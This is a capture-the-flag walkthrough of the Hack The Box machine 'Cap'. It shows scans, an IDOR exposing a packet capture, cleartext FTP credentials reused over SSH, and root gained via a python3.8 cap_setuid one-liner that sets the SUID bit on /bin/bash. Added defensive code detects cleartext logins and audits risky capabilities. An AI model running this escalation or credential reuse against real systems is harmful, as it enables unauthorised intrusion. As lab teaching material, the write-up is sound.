HTB - Cap | (Difficulty Easy) - Linux
Writeup of the easy-difficulty machine Cap from https://hackthebox.eu
Useful Skills
- Web enumeration
- Insecure Direct Object Reference (IDOR)
- PCAP capture analysis (tshark)
- Information Leakage
- Credentials Reuse
- Abusing capabilities (/usr/bin/python3.8)
Enumeration
TCP Scan
rustscan -a 10.10.10.245 --ulimit 5000 -g
10.10.10.245 -> [22,21,80]
nmap -p22,21,80 -sCV 10.10.10.245 -oN tcpScan
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-17 17:05 CET
Nmap scan report for 10.10.10.245
Host is up (0.035s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 fa:80:a9:b2:ca:3b:88:69:a4:28:9e:39:0d:27:d5:75 (RSA)
| 256 96:d8:f8:e3:e8:f7:71:36:c5:49:d5:9d:b6:a4:c9:0c (ECDSA)
|_ 256 3f:d0:ff:91:eb:3b:f6:e1:9f:2e:8d:de:b3:de:b2:18 (ED25519)
80/tcp open http gunicorn
|_http-title: Security Dashboard
|_http-server-header: gunicorn
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.0 404 NOT FOUND
| Server: gunicorn
| Date: Fri, 17 Jan 2025 16:06:23 GMT
| Connection: close
| Content-Type: text/html; charset=utf-8
| Content-Length: 232
| <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
| <title>404 Not Found</title>
| <h1>Not Found</h1>
| <p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
| GetRequest:
| HTTP/1.0 200 OK
| Server: gunicorn
| Date: Fri, 17 Jan 2025 16:06:16 GMT
| Connection: close
| Content-Type: text/html; charset=utf-8
| Content-Length: 19386
| <!DOCTYPE html>
| <html class="no-js" lang="en">
| <head>
| <meta charset="utf-8">
| <meta http-equiv="x-ua-compatible" content="ie=edge">
| <title>Security Dashboard</title>
| <meta name="viewport" content="width=device-width, initial-scale=1">
| <link rel="shortcut icon" type="image/png" href="/static/images/icon/favicon.ico">
| <link rel="stylesheet" href="/static/css/bootstrap.min.css">
| <link rel="stylesheet" href="/static/css/font-awesome.min.css">
| <link rel="stylesheet" href="/static/css/themify-icons.css">
| <link rel="stylesheet" href="/static/css/metisMenu.css">
| <link rel="stylesheet" href="/static/css/owl.carousel.min.css">
| <link rel="stylesheet" href="/static/css/slicknav.min.css">
| <!-- amchar
| HTTPOptions:
| HTTP/1.0 200 OK
| Server: gunicorn
| Date: Fri, 17 Jan 2025 16:06:16 GMT
| Connection: close
| Content-Type: text/html; charset=utf-8
| Allow: GET, HEAD, OPTIONS
| Content-Length: 0
| RTSPRequest:
| HTTP/1.1 400 Bad Request
| Connection: close
| Content-Type: text/html
| Content-Length: 196
| <html>
| <head>
| <title>Bad Request</title>
| </head>
| <body>
| <h1><p>Bad Request</p></h1>
| Invalid HTTP Version 'Invalid HTTP Version: 'RTSP/1.0''
| </body>
|_ </html>
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 134.61 seconds
UDP Scan
nmap -sU --top-ports 1500 --min-rate 5000 -n -Pn 10.10.10.245 -oN udpScan
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-17 17:17 CET
Nmap scan report for 10.10.10.245
Host is up (0.035s latency).
Not shown: 1494 open|filtered udp ports (no-response)
PORT STATE SERVICE
207/udp closed at-7
19315/udp closed keyshadow
20445/udp closed unknown
21366/udp closed unknown
28190/udp closed unknown
49197/udp closed unknown
Nmap done: 1 IP address (1 host up) scanned in 0.88 seconds
FTP Enumeration
On port 21/TCP I find an FTP server running vsftpd 3.0.3; at first glance anonymous login is not available.
Knowing that the FTP version is vsftpd 3.0.3, I can look for information about known vulnerabilities in it.
I search for vulnerabilities in vsftpd 3.0.3, but the most interesting thing I find is a denial of service.
HTTP Enumeration
Whatweb reports an outdated jQuery version, a title indicating that this is a security dashboard, and a gunicorn HTTP server.
whatweb http://10.10.10.245
http://10.10.10.245 [200 OK] Bootstrap, Country[RESERVED][ZZ], HTML5, HTTPServer[gunicorn], IP[10.10.10.245], JQuery[2.2.4], Modernizr[2.8.3.min], Script, Title[Security Dashboard], X-UA-Compatible[ie=edge]
Browsing to http://10.10.10.245 I can see a security monitoring dashboard that collects security events, port scans among others.
Exploitation
IDOR (Insecure Direct Object Reference)
I open the navbar section called Security Snapshot (5 Second PCAP + Analysis).
In the URL I see /data/19; there may be more resources such as 0, 1, 2, 3…
I try different numbers such as 0, 1, 2, 3…; on reaching 0 the information changes, which tells me I am facing an IDOR, since I am being allowed to access different resources and information directly.
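The object-level authorization check that the dashboard lacks, as an added example (not the Cap application's own code): an unchecked lookup that behaves like the IDOR above, next to two hardened lookups, one verifying ownership and one issuing per-user random references so the sequential id never appears in the URL. The store, users and captures are constructed.

```python
import secrets
from dataclasses import dataclass, field

@dataclass
class Capture:
    capture_id: int
    owner: str
    pcap: bytes

@dataclass
class CaptureStore:
    captures: dict = field(default_factory=dict)
    # Per-user indirect references: random token -> internal id, so the
    # sequential internal id is never exposed in a URL like /data/19.
    refs: dict = field(default_factory=dict)

    def add(self, owner: str, pcap: bytes) -> str:
        cid = len(self.captures)
        self.captures[cid] = Capture(cid, owner, pcap)
        token = secrets.token_urlsafe(16)
        self.refs.setdefault(owner, {})[token] = cid
        return token

    def get_unchecked(self, capture_id: int):
        """Vulnerable lookup: any user can read any capture by guessing its id."""
        return self.captures.get(capture_id)

    def get_for_user(self, user: str, capture_id: int):
        """Hardened lookup: the object must belong to the requesting user.
        A foreign id is answered like a missing one, so ids cannot be enumerated."""
        cap = self.captures.get(capture_id)
        if cap is None or cap.owner != user:
            return None
        return cap

    def get_by_ref(self, user: str, token: str):
        """Hardened + indirect: resolve a token issued to this user only;
        a token that belongs to another user does not resolve at all."""
        cid = self.refs.get(user, {}).get(token)
        return None if cid is None else self.captures[cid]

def build_demo_store():
    """Constructed data: two users, each owning one capture (ids 0 and 1)."""
    store = CaptureStore()
    admin_token = store.add("admin", b"constructed admin pcap")
    nathan_token = store.add("nathan", b"constructed nathan pcap")
    return store, admin_token, nathan_token
```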
I download the pcap capture and analyze it with tshark, filtering only packets involving the FTP protocol, and find the credentials nathan:Buck3tH4TF0RM3!
tshark -r 0.pcap -Y "ftp"
Running as user "root" and group "root". This could be dangerous.
34 2.626895 192.168.196.16 → 192.168.196.1 FTP 76 Response: 220 (vsFTPd 3.0.3)
36 4.126500 192.168.196.1 → 192.168.196.16 FTP 69 Request: USER nathan
38 4.126630 192.168.196.16 → 192.168.196.1 FTP 90 Response: 331 Please specify the password.
40 5.424998 192.168.196.1 → 192.168.196.16 FTP 78 Request: PASS Buck3tH4TF0RM3!
42 5.432387 192.168.196.16 → 192.168.196.1 FTP 79 Response: 230 Login successful.
43 5.432801 192.168.196.1 → 192.168.196.16 FTP 62 Request: SYST
45 5.432937 192.168.196.16 → 192.168.196.1 FTP 75 Response: 215 UNIX Type: L8
47 6.309628 192.168.196.1 → 192.168.196.16 FTP 84 Request: PORT 192,168,196,1,212,140
49 6.309874 192.168.196.16 → 192.168.196.1 FTP 107 Response: 200 PORT command successful. Consider using PASV.
50 6.310514 192.168.196.1 → 192.168.196.16 FTP 62 Request: LIST
51 6.311053 192.168.196.16 → 192.168.196.1 FTP 95 Response: 150 Here comes the directory listing.
52 6.311479 192.168.196.16 → 192.168.196.1 FTP 80 Response: 226 Directory send OK.
54 7.380771 192.168.196.1 → 192.168.196.16 FTP 84 Request: PORT 192,168,196,1,212,141
55 7.380998 192.168.196.16 → 192.168.196.1 FTP 107 Response: 200 PORT command successful. Consider using PASV.
56 7.381554 192.168.196.1 → 192.168.196.16 FTP 66 Request: LIST -al
57 7.382165 192.168.196.16 → 192.168.196.1 FTP 95 Response: 150 Here comes the directory listing.
58 7.382504 192.168.196.16 → 192.168.196.1 FTP 80 Response: 226 Directory send OK.
60 28.031068 192.168.196.1 → 192.168.196.16 FTP 64 Request: TYPE I
61 28.031221 192.168.196.16 → 192.168.196.1 FTP 87 Response: 200 Switching to Binary mode.
62 28.031547 192.168.196.1 → 192.168.196.16 FTP 84 Request: PORT 192,168,196,1,212,143
63 28.031688 192.168.196.16 → 192.168.196.1 FTP 107 Response: 200 PORT command successful. Consider using PASV.
64 28.031932 192.168.196.1 → 192.168.196.16 FTP 72 Request: RETR notes.txt
65 28.032072 192.168.196.16 → 192.168.196.1 FTP 82 Response: 550 Failed to open file.
67 31.127551 192.168.196.1 → 192.168.196.16 FTP 62 Request: QUIT
68 31.127652 192.168.196.16 → 192.168.196.1 FTP 70 Response: 221 Goodbye.
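What makes this capture so valuable, a cleartext FTP login, is also what a defender can alert on. Added example, not from the original writeup: a detector over tshark-style FTP summary lines (constructed sample modelled on the capture above, with a second made-up failed login) that pairs USER/PASS with the server's reply and reports the attempt with the password redacted to its length.

```python
import re
from dataclasses import dataclass

# One tshark summary line: frame, time, src → dst, protocol, length, direction, text.
LINE_RE = re.compile(
    r"^\s*\d+\s+[\d.]+\s+(?P<src>\S+)\s+→\s+(?P<dst>\S+)"
    r"\s+FTP\s+\d+\s+(?P<kind>Request|Response):\s+(?P<text>.*)$"
)

# Constructed sample modelled on the capture above (the guest login is made up).
SAMPLE = """\
36 4.126500 192.168.196.1 → 192.168.196.16 FTP 69 Request: USER nathan
40 5.424998 192.168.196.1 → 192.168.196.16 FTP 78 Request: PASS Buck3tH4TF0RM3!
42 5.432387 192.168.196.16 → 192.168.196.1 FTP 79 Response: 230 Login successful.
70 9.000000 192.168.196.1 → 192.168.196.16 FTP 69 Request: USER guest
71 9.100000 192.168.196.1 → 192.168.196.16 FTP 78 Request: PASS wrongpass
72 9.200000 192.168.196.16 → 192.168.196.1 FTP 80 Response: 530 Login incorrect.
"""

@dataclass
class CleartextLogin:
    client: str
    server: str
    user: str
    password_length: int   # redacted: the alert must not carry the secret itself
    success: bool

def detect_cleartext_logins(text: str):
    """Pair USER/PASS requests per client->server flow with the server's
    reply (230 = success, 530 = failure) and emit one event per attempt."""
    pending = {}  # (client, server) -> [user, password]
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        src, dst, kind, body = m["src"], m["dst"], m["kind"], m["text"]
        if kind == "Request":
            verb, _, arg = body.partition(" ")
            if verb == "USER":
                pending[(src, dst)] = [arg, None]
            elif verb == "PASS" and (src, dst) in pending:
                pending[(src, dst)][1] = arg
        else:
            flow = (dst, src)  # a response travels server -> client
            code = body.split(" ", 1)[0]
            if flow in pending and pending[flow][1] is not None and code in ("230", "530"):
                user, pw = pending.pop(flow)
                events.append(CleartextLogin(dst, src, user, len(pw), code == "230"))
    return events
```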
I log in over FTP as user nathan with the password Buck3tH4TF0RM3!
ftp 10.10.10.245
Connected to 10.10.10.245.
220 (vsFTPd 3.0.3)
Name (10.10.10.245:juanca): nathan
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp>
I use pwd to see where I am: I am in nathan's home directory, which holds the user flag and a file called privesc.
ftp 10.10.10.245
Connected to 10.10.10.245.
220 (vsFTPd 3.0.3)
Name (10.10.10.245:juanca): nathan
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> pwd
Remote directory: /home/nathan
ftp> dir
229 Entering Extended Passive Mode (|||30530|)
150 Here comes the directory listing.
-rw-rw-r-- 1 1001 1001 46 Jan 17 20:52 privesc
-r-------- 1 1001 1001 33 Jan 17 19:43 user.txt
226 Directory send
I try the same username and password over SSH and get access without any trouble, thanks to password reuse.
ssh nathan@10.10.10.245
nathan@10.10.10.245's password:
nathan@cap:~$ whoami
nathan
Post exploitation
Privilege escalation
I obtain access to the system as user nathan, a low-privileged user, so I need to find some way to escalate my privileges and become root.
nathan@cap:~$ grep sh$ /etc/passwd
root:x:0:0:root:/root:/bin/bash
nathan:x:1001:1001::/home/nathan:/bin/bash
I recall that nathan's home directory contains a file called privesc, which I downloaded via FTP, so I inspect it and see a small Python script that imports the os library, sets the UID to 0 (root) and spawns /bin/bash.
nathan@cap:~$ cat privesc
import os
os.setuid(0)
os.system("/bin/bash")
I check the system's SUID binaries, but find nothing of interest.
nathan@cap:~$ find / -perm -4000 2>/dev/null | grep -v /snap*
/usr/bin/umount
/usr/bin/newgrp
/usr/bin/pkexec
/usr/bin/mount
/usr/bin/gpasswd
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/sudo
/usr/bin/at
/usr/bin/chsh
/usr/bin/su
/usr/bin/fusermount
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
I check the system's file capabilities and see that Python3.8 is listed.
nathan@cap:~$ getcap -r / 2>/dev/null
/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip
/usr/bin/ping = cap_net_raw+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+
Capabilities allow a process to perform actions that normally only root could, without granting all of root's privileges; this lets a process hold certain elevated privileges. Since I can run Python with elevated privileges, I can change my user's UID to 0 (root) and set the SUID bit on the /bin/bash binary, in the same spirit as the privesc file in nathan's home directory.
nathan@cap:~$ /usr/bin/python3.8 -c 'import os; os.setuid(0); os.system("chmod 4777 /bin/bash")'
nathan@cap:~$ ls -l /bin/bash
-rwsrwxrwx 1 root root 1183448 Jun 18 2020 /bin/bash
nathan@cap:~$ bash -p
bash-5.0# whoami
root
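The getcap output above is what a host audit should catch before anyone else does. Added example, not from the original writeup: a parser for `getcap -r` output that flags root-equivalent capabilities held effectively or inheritably by an interpreter, which is exactly the /usr/bin/python3.8 = cap_setuid case; the capability list and the severity labels are my assumptions.

```python
import os
import re

# Sample `getcap -r /` output: the lines from the writeup above.
SAMPLE_GETCAP = """\
/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip
/usr/bin/ping = cap_net_raw+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+
"""

# Capabilities that amount to root when the caller controls what the program
# executes (assumed list; cap_setuid is the one abused on this machine).
ROOT_EQUIVALENT = {"cap_setuid", "cap_setgid", "cap_sys_admin", "cap_dac_override",
                   "cap_dac_read_search", "cap_sys_ptrace", "cap_sys_module", "cap_chown"}
INTERPRETER_RE = re.compile(r"^(python|perl|ruby|node|php|bash|sh|lua)[\d.]*$")
LINE_RE = re.compile(r"^(?P<path>\S+)\s*=\s*(?P<caps>[\w,]*)\+(?P<flags>[eip]*)\s*$")

def parse_getcap(text: str) -> dict:
    """Return {path: (set_of_caps, flags)}. A line cut off after '+', like the
    gst-ptp-helper one above, still parses, with an empty flag string."""
    result = {}
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            caps = {c for c in m["caps"].split(",") if c}
            result[m["path"]] = (caps, m["flags"])
    return result

def find_risky(caps_by_path: dict) -> list:
    """Flag root-equivalent caps that are effective or inheritable (+e / +i).
    Interpreters get 'critical': running them means running caller-chosen code.
    Purpose-built helpers such as ping with cap_net_raw are not reported."""
    risky = []
    for path, (caps, flags) in caps_by_path.items():
        bad = caps & ROOT_EQUIVALENT
        if not bad or not ("e" in flags or "i" in flags):
            continue
        severity = "critical" if INTERPRETER_RE.match(os.path.basename(path)) else "review"
        risky.append((path, sorted(bad), severity))
    return risky
```

On a live host, `setcap -r /usr/bin/python3.8` drops the file capability entirely; a service that only needs to bind a low port should get cap_net_bind_service on its own dedicated binary, never on a general-purpose interpreter.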